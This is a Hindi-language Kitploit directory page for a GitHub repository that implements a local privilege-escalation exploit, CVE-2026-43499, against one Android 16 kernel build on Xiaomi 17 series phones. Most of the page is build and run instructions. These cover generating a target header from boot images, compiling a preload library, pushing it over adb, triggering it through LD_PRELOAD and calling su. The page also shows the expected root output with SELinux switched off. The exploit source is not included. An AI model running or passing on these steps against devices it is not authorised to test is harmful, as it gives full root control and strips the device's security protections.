Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-43499-popsicle — CVE-2026-43499 Implementation for 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k | Kitploit
उपकरण/GitHubGitHub/x-spy/cve-2026-43499-popsicle
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणमोबाइल सुरक्षाबाइनरी शोषण
GitHubx-spy/cve-2026-43499-popsicle

CVE-2026-43499-popsicle

CVE-2026-43499 Implementation for 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

रिपॉजिटरी देखें
2198181 महीना पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-43499 for popsicle

यह भंडार Xiaomi 17 Pro Max (popsicle) पर Android 16 के लिए CVE-2026-43499 स्थानीय विशेषाधिकार वृद्धि कार्यान्वयन शामिल करता है। सत्यापित कर्नेल:

root@kitploit:~
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

इस कर्नेल का उपयोग करने वाले Xiaomi 17, Pro और Ultra श्रृंखला सभी सत्यापित हैं और उपलब्ध हैं।

लक्ष्य उत्पन्न करें

Python 3 और llvm-objdump पर निर्भरता:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  -o source/src/target.h

संकलन

root@kitploit:~
make -C source clean preload

जब NDK स्वचालित रूप से खोजा नहीं जा सकता:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

अंतिम उत्पाद:

root@kitploit:~
source/build/bin/preload.so

चलाना

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

सफलता पर दिखाई देता है:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0

शोषण पूरा होने के बाद, स्क्रीन चालू कर सकते हैं, अनलॉक कर सकते हैं और डेस्कटॉप में प्रवेश कर सकते हैं, लेकिन नए लॉन्च किए गए Android ऐप फ्रेमवर्क प्रारंभिकरण पूरा नहीं कर पाते और क्रैश हो जाते हैं; रिबूट के बाद ऐप सामान्य रूप से लॉन्च होते हैं।

टूल डाउनलोड करें